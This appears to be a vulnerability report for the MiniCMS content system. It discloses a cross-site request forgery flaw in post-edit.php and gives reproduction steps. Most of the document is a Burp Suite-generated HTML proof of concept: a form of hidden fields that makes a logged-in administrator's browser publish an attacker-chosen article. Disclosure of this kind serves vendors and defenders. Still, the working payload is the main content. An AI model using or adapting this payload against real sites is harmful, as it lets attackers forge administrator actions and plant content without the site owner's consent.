There is another CSRF vulnerabilities in post-edit.php that can lead to add article #51
Description
Vendor of Product
https://github.com/bg5sbk/MiniCMS
Vulnerability Type
CSRF
Vulnerable File
post-edit.php
Affected Product Code Base
<v1.11
POC
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://www.minicms.com/mc-admin/post-edit.php" method="POST">
<input type="hidden" name="_IS_POST_BACK_" value="" />
<input type="hidden" name="title" value="THISpoc" />
<input type="hidden" name="content" value="thispoc" />
<input type="hidden" name="tags" value="" />
<input type="hidden" name="year" value="" />
<input type="hidden" name="month" value="" />
<input type="hidden" name="day" value="" />
<input type="hidden" name="hourse" value="" />
<input type="hidden" name="minute" value="" />
<input type="hidden" name="second" value="" />
<input type="hidden" name="can_comment" value="1" />
<input type="hidden" name="state" value="publish" />
<input type="hidden" name="id" value="" />
<input type="hidden" name="save" value="保存" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Vulnerability reproduction
- After the installation is complete, log in as administrator.
- Save poc as HTML file
- Accessing this HTML file in a browser ,click "Submit request"
- Successful exploitation of vulnerabilities
